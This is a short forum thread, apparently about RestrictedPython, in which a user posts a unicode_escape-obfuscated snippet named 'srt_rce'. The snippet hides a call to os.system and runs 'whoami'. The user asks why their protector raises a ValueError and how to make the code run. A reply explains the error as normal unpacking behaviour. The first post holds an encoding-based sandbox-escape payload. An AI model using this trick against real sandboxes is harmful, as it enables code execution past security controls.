unpack question

[jsmith173]

I've the following code

encoding: unicode_escape

a1,srt_rce,a2 = ''' \u0027\u0027\u0027\u002C\u0067\u0065\u0074\u0061\u0074\u0074\u0072\u0028\u005F\u005F\u0069\u006D\u0070\u006F\u0072\u0074\u005F\u005F\u0028\u0027\u006F\u0073\u0027\u0029\u002C\u0020\u0027\u0073\u0079\u0073\u0074\u0065\u006D\u0027\u0029\u002C\u0027\u0027\u0027 ''' srt_rce('whoami')

The unicode escape is: ''',getattr(import('os'), 'system'),'''

The protector code raises ValueError "too many values to unpack (expected 3)" in exec In my protector code I have: "_iter_unpacksequence": RestrictedPython.Guards.guarded_iter_unpack_sequence, "_unpacksequence": RestrictedPython.Guards.guarded_unpack_sequence,

My question: Is this exception normal? Why the original code is not executed? What to do when I want to execute this code?

[d-maurer]

jsmith173 wrote at 2024-3-25 00:13 -0700:

I've the following code

encoding: unicode_escape

a1,srt_rce,a2 = ''' \u0027\u0027\u0027\u002C\u0067\u0065\u0074\u0061\u0074\u0074\u0072\u0028\u005F\u005F\u0069\u006D\u0070\u006F\u0072\u0074\u005F\u005F\u0028\u0027\u006F\u0073\u0027\u0029\u002C\u0020\u0027\u0073\u0079\u0073\u0074\u0065\u006D\u0027\u0029\u002C\u0027\u0027\u0027 ''' ... The protector code raises ValueError "too many values to unpack (expected 3)" in exec

When I look at the code above, I would say ValueError is correct: The right hand side is a string with more than 3 characters, the left hand side wants 3 objects; ValueError is the expected outcome.

... My question: Is this exception normal?

Yes.

Why the original code is not executed?

It is but the "execution" of a string literal is the string literal.

What to do when I want to execute this code?

You do not put expressions into a string when you want the expressions evaluated (unless you use the string as source code for a compilation; in this case, however, you should show us the compilation code).